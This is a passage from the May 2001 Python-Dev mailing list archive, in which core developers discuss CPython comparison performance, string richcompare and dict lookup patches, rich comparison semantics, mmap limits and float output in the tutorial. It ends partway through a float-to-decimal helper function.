tp_richcompare of strings to 0, I get past this code, and do > > c = (*f)(v, w); > if (PyErr_Occurred()) Note that the usual way to write this is if (c < 0 && PyErr_Occurred()) More work for my artificial "ab" < "cd" case but a net win in real life (when c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas, when c < 0 there's no way in the cmp protocol to use c's value alone to distinguish between "less than" and "error"). > return NULL; > return convert_3way_to_object(op, c); > > Here, I get 3 function calls: f is string_compare, then > PyErr_Occurred, finally convert_3way_to_object, which converts > {-1,0,1} x Op -> {Py_True, Py_False}. Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. > Indeed, when I inline convert_3way_to_object, I get the same speed in > both cases (with the remaining differences attributed to measurement > and gcc doing register usage differently in both functions). OK, understood, and thanks for following up! > I'd still be in favour of giving strings a richcompare, since it > allows to optimize what I think is the single most frequent case: > Py_EQ on strings. In the absence of significant sorting, I agreed Py_EQ is most frequent. > With a control flow like > > if (a->ob_size != b->ob_size) > goto False; > > if (a->ob_size == 0) > goto True; > > if (a->ob_sval[0] != b->ob_sval[0]) > goto False; > > if(memcmp(a->ob_sval, b->ob_sval, a->ob_size)) > goto False; > else > goto True; > > we can reduce the number of function calls Suggest collapsing the third into the first: if (a->ob_size != b->ob_size || a->ob_sval[0] != b->ob_sval[0]) goto False; There's no danger of over-indexing when ob_size==0, because it doesn't include the trailing null byte Python always sticks at the end of string objects; and the first-byte check is much more likely to pay off than the zero-length check (comparison to a null string? gotta be rare as clear conclusions ), and better to test for the more common case first. From tim.one at home.com Sun May 20 11:54:08 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 05:54:08 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de> Message-ID: [Tim] >> 1. String objects are also equal despite being different objects, >> if their ob_sinterned pointers are equal and non-NULL. So if >> you're looking for every trick in & out of the book, that's >> another one. [Martin v. Loewis] > That does not help. In the entire test suite, there are 0 instances > where strings are compared which are not identical, but have equal > ob_sinterned pointers. Good to know. Had you tried this a few weeks ago, there would have been thousands (it so happened that one-character strings weren't being interned *effectively*, and there were lots of 1-character cases then where #1 applied; that's been fixed; good to know more aren't popping up). > ... > Whether there's a fruitless branch depends on your compiler. A branch instruction is a branch instruction; I didn't distinguish between taken and non-taken branches, as there's no uniformity in codegen across platforms. > With gcc 3, you can write > > if (__builtin_expect(a == b, 0)) { > > and then the body of the if block will be moved out of the way of > linear control flow. I don't think we'll be littering Python with compiler-specific hacks. It's good to get the less common case out-of-line, but it's not a pure win: while it reduces the penalty when the test doesn't pay, it also reduces the benefit when it does pay (by the wildly architecture-dependent cost of taking a mispredicted out-of-line branch, and the wildly compiler-dependent costs of how seriously they take their own decisions or user hints to out-of-line a block (e.g., the compiler may refetch everything from memory again at the target if it thinks it's truly rare)). >> Any idea where those 800,000 virgin calls to oldcomp are coming >> from? That's a lot. > As far as I could trace it, most of them come from lookdict_string (at > various locations inside this function). Ah! Of course. string_compare is hardwired into lookdict_string. This case may be important enough to merit a distinct _PyString_Equal function, with just the stuff lookdict_string needs (e.g., there's never a gain in testing for pointer equality when called from lookdict_string because the dict code already checked that; but there may be a gain for that test in an all-purpose string_richcompare). > ... > So to support sorting better, I should special-case Py_LT in > string_richcompare also, to avoid the function call ?-) Of course. string_richcompare has to do a memcmp to resolve Py_EQ and Py_NE anway, and that's most of the work for resolving all 6 possibilities. Get rid of string_compare entirely! [on cmp sloth] > Yes, that is a serious problem. Fortunately, very few calls in my > programs go to string_compare through cmp() now. But then, your > programs are different, of course... There are search-tree modules I have but didn't write that do this; I don't care enough about them to frustrate Guido's grand vision > It may be more important for sequences other than 8-bit strings, as each call to a comparison function for a pair of non-string sequences is very expensive (involving more layers of calls for each element comparison). From tim.one at home.com Sun May 20 12:13:14 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 06:13:14 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I have always thought that eventually (but long before Py3K!) all > objects would only support rich comparisons and the __cmp__ and > tp_compare slots would become completely obsolete. If the time machine batteries can hold a full charge, you may want to go back and add Py_CMP as a seventh possible desired-operation argument to tbe rich comparison API. My experience with dict comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full cmp, so I put the dict oldcmp back in order to avoid having dict richcmp (potentially) compute cmp 3 times to fake one cmp. But if dict richcmp knew a cmp outcome was desired, it could compute it with no extra work to speak of. Then there would be no reason at all to hold on to the dict tp_compare slot. The list and tuple richcmps are also doing almost all the work needed to compute a 3-way cmp outcome. From tim.one at home.com Sun May 20 13:05:53 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 07:05:53 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B037D27.E258C363@lemburg.com> Message-ID: [M.-A. Lemburg] > ... > Running the same test for 2.1 vs. 2.0 there's not much to > notice, so the important changes seem to be originating in > the move from 1.5.2 to 2.0. IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for 1.5.2, and Fredrik did more independently (like inlining high-frequency int operations in the eval loop). Also IIRC, that's the last time any concerted effort was put into speeding Python. 1.5.2 was an efficiency peak, then, and unstable equilibrium never endures without deliberate and persistent rebalancing work. If Python were "a real product", it would be at least one person's full-time job to keep it in peak shape. But it's not even a part-time job for anyone, and I don't see that changing. In compensation, machines have gotten faster much quicker than Python has slowed. From mal at lemburg.com Sun May 20 13:50:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 20 May 2001 13:50:17 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B07AF79.6EB42E54@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > ... > > Running the same test for 2.1 vs. 2.0 there's not much to > > notice, so the important changes seem to be originating in > > the move from 1.5.2 to 2.0. > > IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for > 1.5.2, and Fredrik did more independently (like inlining high-frequency int > operations in the eval loop). Also IIRC, that's the last time any concerted > effort was put into speeding Python. 1.5.2 was an efficiency peak, then, and > unstable equilibrium never endures without deliberate and persistent > rebalancing work. If Python were "a real product", it would be at least one > person's full-time job to keep it in peak shape. But it's not even a > part-time job for anyone, and I don't see that changing. In compensation, > machines have gotten faster much quicker than Python has slowed. How about making performance the main "feature" for 2.3 then ?! 2.0 - 2.2 introduced many new features in the interpreter core, so I think it's time to stabilize those features and focus on making Python regain the performance it had before those features were introduced. At least to some of us, performance is an issue and I think that there's a lot we can do to improve it. One way to open up the field for better performance will be to modularize the interpreter, so that new ways of optimization can be explored, e.g. truning the VM a register machine (Skip once started looking into this with his Rattlesnake patches) or creating specialized VMs which can then be used by optimizing compilers as targets. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh at python.net Sun May 20 13:52:40 2001 From: mwh at python.net (Michael Hudson) Date: 20 May 2001 12:52:40 +0100 Subject: [Python-Dev] Comparison speed In-Reply-To: "Tim Peters"'s message of "Sun, 20 May 2001 05:54:08 -0400" References: Message-ID: "Tim Peters" writes: > Ah! Of course. string_compare is hardwired into lookdict_string. > This case may be important enough to merit a distinct > _PyString_Equal function, with just the stuff lookdict_string needs Or just inlining it all into lookdict_string, something like: Index: Objects/dictobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v retrieving revision 2.90 diff -c -r2.90 dictobject.c *** Objects/dictobject.c 2001/05/19 07:04:38 2.90 --- Objects/dictobject.c 2001/05/20 11:51:28 *************** *** 279,286 **** register unsigned int mask = mp->ma_size-1; dictentry *ep0 = mp->ma_table; register dictentry *ep; - cmpfunc compare = PyString_Type.tp_compare; /* make sure this function doesn't have to handle non-string keys */ if (!PyString_Check(key)) { #ifdef SHOW_CONVERSION_COUNTS --- 279,287 ---- register unsigned int mask = mp->ma_size-1; dictentry *ep0 = mp->ma_table; register dictentry *ep; + #define S(s) ((PyStringObject*)(s)) + /* make sure this function doesn't have to handle non-string keys */ if (!PyString_Check(key)) { #ifdef SHOW_CONVERSION_COUNTS *************** *** 299,305 **** freeslot = ep; else { if (ep->me_hash == hash ! && compare(ep->me_key, key) == 0) { return ep; } freeslot = NULL; --- 300,308 ---- freeslot = ep; else { if (ep->me_hash == hash ! && S(ep->me_key)->ob_size == S(key)->ob_size ! && memcmp(S(ep->me_key)->ob_sval, ! S(key)->ob_sval,S(key)->ob_size) == 0) { return ep; } freeslot = NULL; *************** *** 318,324 **** if (ep->me_key == key || (ep->me_hash == hash && ep->me_key != dummy ! && compare(ep->me_key, key) == 0)) return ep; else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; --- 321,329 ---- if (ep->me_key == key || (ep->me_hash == hash && ep->me_key != dummy ! && S(ep->me_key)->ob_size == S(key)->ob_size ! && memcmp(S(ep->me_key)->ob_sval, ! S(key)->ob_sval,S(key)->ob_size) == 0)) return ep; else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; *************** *** 327,332 **** --- 332,339 ---- if (incr > mask) incr ^= mp->ma_poly; /* clears the highest bit */ } + + #undef S } /* (apologies for the use of the preprocessor...). I'll leave it to someone else to work out if this is a win or not... -- >> REVIEW OF THE YEAR, 2000 << It was shit. Give us another one. -- NTK Know, 2000-12-29, http://www.ntk.net/ From tim.one at home.com Sun May 20 14:57:11 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 08:57:11 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B07AF79.6EB42E54@lemburg.com> Message-ID: [MAL] > How about making performance the main "feature" for 2.3 then ?! Guido may be a dictator, but he doesn't have a magic wand -- "the main feature" is what people volunteer to do and then fight for and then actually do. > 2.0 - 2.2 introduced many new features in the interpreter core, > so I think it's time to stabilize those features and focus on > making Python regain the performance it had before those features > were introduced. At least to some of us, performance is an > issue and I think that there's a lot we can do to improve it. "Performance" is meaningless unless quantified and made concrete: what is it that runs too slowly? "Everything" is not a useful answer. Speeding up line-at-a-time input was an example of something that worked, via focus and measurement and pushing ahead despite opposition. I doubt any other approach will bear fruit over such a short timeframe, and especially not without resources to throw at it. > One way to open up the field for better performance will be > to modularize the interpreter, so that new ways of optimization > can be explored, e.g. truning the VM a register machine > (Skip once started looking into this with his Rattlesnake > patches) or creating specialized VMs which can then be used > by optimizing compilers as targets. Restructure the core for the benefit of optimizing compilers that don't exist? That sounds like an interesting research project, but not much to do with making 2.3 faster. In the meantime, modularization is more likely to make the VM that does exist slower. could-be-it's-easy-answers-or-none-ly y'rs - tim From tim.one at home.com Sun May 20 14:58:09 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 08:58:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Message-ID: [Michael Hudson] > ... > (apologies for the use of the preprocessor...). I'll leave it to > someone else to work out if this is a win or not... Umm, but that's the *hard* part. I think even Guido knows how to do a string compare inline . From tim.one at home.com Sun May 20 15:09:50 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 09:09:50 -0400 Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182107.RAA16214@cliff.concentric.net> Message-ID: [Jeremy Hylton] > ... > The scary thing about BuiltinFunctinoCalls is that the profiler shows > it spending almost 30% of its time in PyArg_ParseTuple(). It > certainly is a shame that we have this complicated, slow run-time > parsing mechanism to deal with a static property of the code, namely > how many arguments it takes and whether their types are. Special-casing the snot out of "O" looks like a winner : count format %total cumulative% ------- -------- ------ ----------- 1440897 'O' 47.45 47.45 327694 'O!' 10.79 58.24 285570 'O|i' 9.40 67.65 262168 'O!|O' 8.63 76.28 227405 'l' 7.49 83.77 146537 's#' 4.83 88.60 76779 'OO|O' 2.53 91.12 65682 '|ss' 2.16 93.29 48033 'OO' 1.58 94.87 39879 'O|O&O&' 1.31 96.18 Those are the top 10 formats passed to PyArg_ParseTuple() during the test suite, after stripping ";" and ":" decorations. fast-paths-on-the-overtired-brain-ly y'rs - tim From aahz at rahul.net Sun May 20 15:50:08 2001 From: aahz at rahul.net (Aahz Maruch) Date: Sun, 20 May 2001 06:50:08 -0700 (PDT) Subject: [Python-Dev] Comparison speed In-Reply-To: from "Tim Peters" at May 20, 2001 06:13:14 AM Message-ID: <20010520135008.12ABE99C80@waltz.rahul.net> Tim Peters wrote: > > If the time machine batteries can hold a full charge, you may want > to go back and add Py_CMP as a seventh possible desired-operation > argument to tbe rich comparison API. My experience with dict > comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE > any cheaper than by doing a full cmp, so I put the dict oldcmp back in > order to avoid having dict richcmp (potentially) compute cmp 3 times > to fake one cmp. But if dict richcmp knew a cmp outcome was desired, > it could compute it with no extra work to speak of. Then there would > be no reason at all to hold on to the dict tp_compare slot. > > The list and tuple richcmps are also doing almost all the work needed > to compute a 3-way cmp outcome. +1 from me; there's one spot in my new Decimal.py where I optimize an expensive pair of equality tests down to one by using cmp(), and it's likely that similar cases will pop up. When I convert to C code, I'll want to keep doing that. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From martin at loewis.home.cs.tu-berlin.de Sun May 20 15:48:43 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 20 May 2001 15:48:43 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de> > string_compare() could special-case pointer equality too, although I suspect > doing so would be a net loss. I've done some measurements here, too, again taking your example from time import clock indices = [1] * 1000000 def doit(): s = clock() for i in indices: "ab" < "ab" f = clock() return f - s for i in xrange(10): print "%.3f" % doit() This is the case where testing for identity helps. Running it without identity test takes 0.74s, running it with identity test takes 0.68s. Now, looking at the case of non-identical pointers, I could not find any measurable difference. After increasing the number of rounds by a factor of ten, I got, without identity test 6.920 6.920 6.910 6.970 7.080 6.920 6.920 6.910 6.930 6.920 With identity test, I got 6.930 6.930 6.920 7.080 6.920 6.930 6.960 6.930 6.920 6.920 That still does not look like a significant difference to me. Regards, Martin From guido at digicool.com Sun May 20 15:56:54 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 20 May 2001 09:56:54 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Sun, 20 May 2001 06:13:14 EDT." References: Message-ID: <200105201356.JAA08372@cj20424-a.reston1.va.home.com> > If the time machine batteries can hold a full charge, you may want to go back > and add Py_CMP as a seventh possible desired-operation argument to tbe rich > comparison API. Funny, I was thinking about this too last night. > My experience with dict comparisons was that dict_richcompare > couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full > cmp, so I put the dict oldcmp back in order to avoid having dict > richcmp (potentially) compute cmp 3 times to fake one cmp. But if > dict richcmp knew a cmp outcome was desired, it could compute it > with no extra work to speak of. Then there would be no reason at > all to hold on to the dict tp_compare slot. I'm not sure I see the saving. There's no real saving in time, because you still have to make separate calls for EQ and CMP, right? There might be a saving in code, but you could solve that internally in dictobject.c by restructuring the code somewhat so that dict_compare shared more with dict_richcompare, right? It's mostly an API streamlining. The other difference between tp_compare and tp_richcompare is that the latter returns an object which makes testing for errors unambiguous. But (for several releases) we would still have to support tp_compare for b/w compatibility with old 3r party extensions. > The list and tuple richcmps are also doing almost all the work needed to > compute a 3-way cmp outcome. Ditto. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Sun May 20 18:19:29 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 20 May 2001 18:19:29 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B07EE91.5747F4F4@lemburg.com> Tim Peters wrote: > > [MAL] > > How about making performance the main "feature" for 2.3 then ?! > > Guido may be a dictator, but he doesn't have a magic wand -- "the main > feature" is what people volunteer to do and then fight for and then actually > do. I will certainly go back to the basics and redo my optimization patches for Python later this year. Whether or not these will get included in the core is another story, but I have a need for a fast interpreter for my app. server and can't afford losing too much performance when moving from 1.5.x to 2.x. > > 2.0 - 2.2 introduced many new features in the interpreter core, > > so I think it's time to stabilize those features and focus on > > making Python regain the performance it had before those features > > were introduced. At least to some of us, performance is an > > issue and I think that there's a lot we can do to improve it. > > "Performance" is meaningless unless quantified and made concrete: what is it > that runs too slowly? "Everything" is not a useful answer. Speeding up > line-at-a-time input was an example of something that worked, via focus and > measurement and pushing ahead despite opposition. I doubt any other approach > will bear fruit over such a short timeframe, and especially not without > resources to throw at it. Let's put it this way: if pystone gets a 50% boost, then all applications should benefit from it regardeless whether they are function call intense or fiddle with a lot of attributes. Achieving those 50% will be a lot harder than for the 1.5 series, though ;-) > > One way to open up the field for better performance will be > > to modularize the interpreter, so that new ways of optimization > > can be explored, e.g. truning the VM a register machine > > (Skip once started looking into this with his Rattlesnake > > patches) or creating specialized VMs which can then be used > > by optimizing compilers as targets. > > Restructure the core for the benefit of optimizing compilers that don't > exist? That sounds like an interesting research project, but not much to do > with making 2.3 faster. In the meantime, modularization is more likely to > make the VM that does exist slower. Depends on how you look at it: extension writers will then have the possibility of plugging in new compilers and VMs into Python to experiment with new optimization strategies. The Rattlesnake project is one such project which would do great with this plugin logic since it uses special opcodes which an optimizer generates and then needs a modified VM to execute these new byte code streams... from Rattlesnake import compiler, vm sys.use_compiler(compiler) sys.use_vm(vm) This won't make stock Python 2.3 faster, but at least provide better means for experiments in that direction. Alternative VM implementations like Stackless Python would also benefit from it. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Sun May 20 23:13:04 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 17:13:04 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis, on pointer-equality tests in string_compare()] > I've done some measurements here, too, again taking your example > ... > for i in indices: > "ab" < "ab" > ... > This is the case where testing for identity helps. Running it without > identity test takes 0.74s, running it with identity test takes 0.68s. This stuff all ties together. A pointer-equality test in string_compare() is guaranteed to lose every time string_compare() gets called from lookdict_string(). Let's lose string_compare() entirely (in favor of a self-contained-- apart from memcmp() --string_richcompare). From tim.one at home.com Sun May 20 23:37:09 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 17:37:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105201356.JAA08372@cj20424-a.reston1.va.home.com> Message-ID: [Tim, muses about a Py_CMP value for rich comparisons, and talks mostly about dict comps] > ... > I'm not sure I see the saving. There's no real saving in time, > because you still have to make separate calls for EQ and CMP, right? Right so far as it goes. A "fast path" (which currently doesn't exist but is clearly worth adding, based on both my and Martin's timings) for doing *all* kinds of same-type comparisons would only have to look for a richcompare slot, though, not one kind of slot in some cases and another in others. Uniformity is contagious . > There might be a saving in code, but you could solve that internally > in dictobject.c by restructuring the code somewhat so that > dict_compare shared more with dict_richcompare, right? Right, there would be no reduction in total code, and the dict routines already share as much as possible. In effect, the body of dict_compare would replace the last res = Py_NotImplemented; line in the (currently tiny) dict_richcompare guarded by the appropriate tests. > It's mostly an API streamlining. Bingo, and the possibility of retiring the tp_compare slot in P3K. > The other difference between tp_compare and tp_richcompare is that > the latter returns an object which makes testing for errors unambiguous. Also cool. > But (for several releases) we would still have to support tp_compare > for b/w compatibility with old 3r party extensions. Sure, although the way the CVS branch code is going it could be that 2.2 is the long-awaited utterly incompatible P3K anyway . >> The list and tuple richcmps are also doing almost all the work needed >> to compute a 3-way cmp outcome. > Ditto. Oh no! Those aren't like dict compares. A rich compare for sequence types (whether strings or lists) *has* to contain almost all the code necessary to implement cmp(), because just resolving Py_EQ in all cases has to find "the first" element (if any) that differs. Once that's known, you're at most one measly element compare away from producing the right cmp() outcome. This isn't true of dict compares: the algorithm for resolving dict Py_EQ/Py_NE when the dict sizes are the same doesn't do anything to help resolve general cmp(). Yes, a tp_compare slot could be re-added to lists and tuples, and implemented via refactoring their current tp_richcompare code into a common internal routine, but then we've just added another layer of function calls for all cases. I've timed C function calls, and it turns out they aren't actually free . From tim.one at home.com Mon May 21 09:53:24 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 21 May 2001 03:53:24 -0400 Subject: [Python-Dev] RE: Rich comparison of lists and tuples In-Reply-To: <200105162035.PAA04299@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I would like to break this down by defining the mapping between cmp() > and rich comparisons. Good idea! > I propose: > > - If cmp() is requested but not defined, and rich comparisons are > defined, try ==, <, > in order; if all three yield false, act as if > rich comparisons were not defined, and use the fallback comparison > (i.e. by address). Here and below didn't cover the case where cmp() is requested and is defined. I believe it's agreed now (but wasn't yet at the time you wrote this) that cmp() will be called in that case (and which requires changes to the current implementation). > - If a rich comparison is requested but not defined, use cmp() and use > the obvious mapping. Cool, except this is missing what I believe was intended detail, like that when given "x < y" and x.__lt__ is not implemented then y.__gt__ will be tried before falling back to cmp(). Also note this today: class C: def __lt__(x, y): print "in __lt__" return NotImplemented def __gt__(x, y): print "in __gt__" return NotImplemented C() < C() That prints in __lt__ in __gt__ in __gt__ in __lt__ I don't know to explain why each method gets called twice (well, I do, but it's hard to swallow ). Again this can have semantic consequences, e.g. if the methods have side-effects; and unclear whether this is intended, a bug, or implementation-defined. > - Continue to define the comparison of unequal sequences in terms of > cmp(). "the comparison" is ambiguous there: you mean all comparisons? just cmp() comparisons? just rich comparisons? In any case, also unclear what "in terms of cmp()" means: that every pair of corresponding elements must be compared via cmp()? Or that only the first non-Py_EQ pair must be compared via cmp()? Pseudo-code would be much clearer than English here. > - Testing == or != for sequences takes these shortcuts: Must take these shortcuts, or may take these shortcuts? > 1. if the lengths differ, the sequences differ Note that I removed the tuple_richcompare code for doing this, because I never found a case where tuples were compared via Py_EQ/Py_NE and the lengths differed. So the length-check in this case was a waste of time. It isn't true of lists or strings that it's a waste of time, but I believe there are strong reasons for why programs simply will not compare different-sized tuples for equality. I would not like to pay for tuple length checks if only one case in 500 billion would benefit, but if #1 is a mandatory shortcut there's no choice. > 2. compare the elements using == until a false return is found Currently the sequence rich-compare code does #2 for all 6 comparison operators. Is that wrong? Looked reasonable to me! > Note that this defines 'x!=y' as 'not x==y' for sequences. We could > easily go the extra mile and define != to use only != on the items; > but is this worth the extra complexity? Not at all: tuples and lists are Python's sequence types, so Python is entitled to define what comparison means for them in any way it likes. We've already got cases where (see the first msg in this thread) [x] cmpop [y] may yield a different result than x cmpop y so we've already punted on doing the best-possible job of mimicking whatever crazy-ass comparisons user-defined objects implement, when those objects are contained in Python sequences. My bias is showing : I want Python's builtin sequence types to be as efficient as possible. Nasty example: two conformable (same rank and dimensions) NumPy matrices A and B return a conformable matrix of 0/1 bits when compared via "<" (well, maybe they actually don't, but that's what drove richcmps to begin with!). It may well be *convenient* for them if (A1, A2, A3) < (B1, B2, B3) always returned a list (or tuple) of 3 0/1 matrices too: [A1 < B1, A2 < B2, A3 < B3] So builtin sequence comparisons can't be all things to all people regardless. From Barrett at stsci.edu Mon May 21 14:17:09 2001 From: Barrett at stsci.edu (Paul Barrett) Date: Mon, 21 May 2001 08:17:09 -0400 Subject: [Python-Dev] mmap module References: Message-ID: <3B090745.5D70353E@STScI.Edu> Tim Peters wrote: > > [Paul Barrett] > > In the CVS log of the mmapmodule.c, Tim Peters says: > > > > "The code really needs to be rethought from scratch (not by me, though > > ...)." > > That was in specific reference to the code I changed, in mmap_find_method. > The difficulty is that mmap is great for "large files", but the code before > my change used a C int for the starting offset and also for the return > value; I boosted those to a C long, which covers 63 bits on 64-bit Linux > boxes, but doesn't help 64-bit Windows at all (where a C long remains 4 > bytes). The mmap_object struct uses size_t to declare the relevant members, > which is possibly better still than C long, but may still leave platform > capabilities out of reach for large files (e.g., "even Win95" *allows* > specifying 64-bit offsets when creating a mapped file view). C is a > friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue() > don't cater to the full range of C integral types anyway. In other words, > if this code is ever to reach its full potential, it "really needs to be > rethought from scratch". OK, thanks for the clarification. > > The ability to have offsets into a file that are not multiples of the > > system pagesize would also be nice. > > It's OS-specific. Python should grow warts to protect against it on the > OSes that care. Well, hopefully the OS-differences wouldn't prevent implementing a more abstract interface. > > I'd be willing to submit a PEP on a new mmapmodule, once I know what > > others would like. > > Hard to say. This has the potential to become Python's next thread > subsystem, i.e. an endless and ultimately hopeless x-platform nightmare. If > you do write a PEP, I vote to say that we'll cover Windows and Linux (and > maybe Mac OS X?) out of the box, but any other platform is at your own risk > (it doesn't really help if somebody pops up volunteering to support a > minority platform, because they eventually go away, their code stops > working, and it never gets fixed -- so it's use-at-your-own-risk in reality > regardless). Yes, I agree. Windows, Unix/Linux, and Mac OS X should be the supported platforms. My intention is not to make major changes to the Python interface, but to fix bugs and to implement some additional features, such as a non-pagesize file offset. I'll try to get something written up in the near future. -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From martin at loewis.home.cs.tu-berlin.de Mon May 21 18:44:59 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 21 May 2001 18:44:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105211644.f4LGixA00818@mira.informatik.hu-berlin.de> > This stuff all ties together. A pointer-equality test in string_compare() is > guaranteed to lose every time string_compare() gets called from > lookdict_string(). Let's lose string_compare() entirely (in favor of a > self-contained-- apart from memcmp() --string_richcompare). Ok. I've now updated my patch on SF to remove string_compare, inline everything into string_richcompare, add _PyString_Eq, and use that in lookdict_string. Who would want to review and approve/reject this patch? Regards, Martin From martin at loewis.home.cs.tu-berlin.de Mon May 21 19:03:59 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 21 May 2001 19:03:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de> > Note that the usual way to write this is > > if (c < 0 && PyErr_Occurred()) > > More work for my artificial "ab" < "cd" case but a net win in real life (when > c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas, > when c < 0 there's no way in the cmp protocol to use c's value alone to > distinguish between "less than" and "error"). Ok. I've updated my tp_compare patch on SF to do so; it also un-deprecates UserList.__cmp__. > > Here, I get 3 function calls: f is string_compare, then > > PyErr_Occurred, finally convert_3way_to_object, which converts > > {-1,0,1} x Op -> {Py_True, Py_False}. > > Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. Any reason why PyThreadState_GET isn't used there? > There's no danger of over-indexing when ob_size==0, because it doesn't > include the trailing null byte Python always sticks at the end of string > objects; and the first-byte check is much more likely to pay off than the > zero-length check (comparison to a null string? gotta be rare as clear > conclusions ), and better to test for the more common case first. This is now also in the string_richcompare patch on SF. Regards, Martin From tim.one at home.com Mon May 21 20:29:02 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 21 May 2001 14:29:02 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2 In-Reply-To: <200105211805.f4LI54T20962@odiug.digicool.com> Message-ID: [Fred checkin] > > *************** > > *** 2610,2617 **** > > \begin{verbatim} > > >>> x = 10 * 3.14 > > ! >>> y = 200*200 > > >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...' > > >>> print s > > ! The value of x is 31.4, and y is 40000... > > >>> # Reverse quotes work on other types besides numbers: > > ... p = [x, y] > > --- 2610,2617 ---- > > \begin{verbatim} > > >>> x = 10 * 3.14 > > ! >>> y = 200 * 200 > > >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...' > > >>> print s > > ! The value of x is 31.400000000000002, and y is 40000... > > >>> # Reverse quotes work on other types besides numbers: > > ... p = [x, y] [Guido] > Hmm... The tutorial now contains at least one example of floating > point imprecision. Does it also contain text to explain this? (I'm > sure Tim would be happy to provide some if there isn't any. :-) [Fred] > It contains others, and I don't think there's an explanation. Some > text from Tim to explain this would be greatly apprectiated! Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4: so long as we rely on the platform C to format floats, the output isn't well-defined (the last digit or so can and will vary across boxes). I can certainly explain that this is so, and even why, but unsure the tutorial is the right place for it. In any case the tutorial shouldn't be giving examples whose output is platform-dependent. For example, don't use 10 * 3.14, use 10 * 3.25. Want me to scour the tutorial for all such cases? Or we could put the attached function at the start of the tutorial and use it to format floats: >>> f2ds(10 * 3.14) '31400000000000002131628207280300557613372802734375e-48' >>> I'm sure newbies would feel assured by that . def f2ds(x): """Return float x as exact decimal string. The string is of the form: "-", if and only if x is < 0. One or more decimal digits. The last digit is not 0 unless x is 0. "e" The exponent, a (possibly signed) integer """ import math # XXX ignoring infinities and NaNs for now. if x == 0: return "0e0" sign = "" if x < 0: sign = "-" x = -x f, e = math.frexp(x) assert 0.5 <= f < 1.0 # x = f * 2**e exactly # Suck up CHUNK bits at a time; 28 is enough so that we suck # up all bits in 2 iterations for all known binary double- # precision formats, and small enough to fit in an int. CHUNK = 28 top = 0L # invariant: x = (top + f) * 2**e exactly while f: f = math.ldexp(f, CHUNK) digit = int(f) assert digit >> CHUNK == 0 top = (top << CHUNK) | digit f -= digit assert 0.0 <= f < 1.0 e -= CHUNK assert top > 0 # Now x = top * 2**e exactly. Get rid of trailing 0 bits if e < 0 # (purely to increase efficiency a little later -- this loop can # be removed without changing the result). while e < 0 and top & 1 == 0: top >>= 1 e += 1 # Transform this into an equal value top' * 10**e'. if 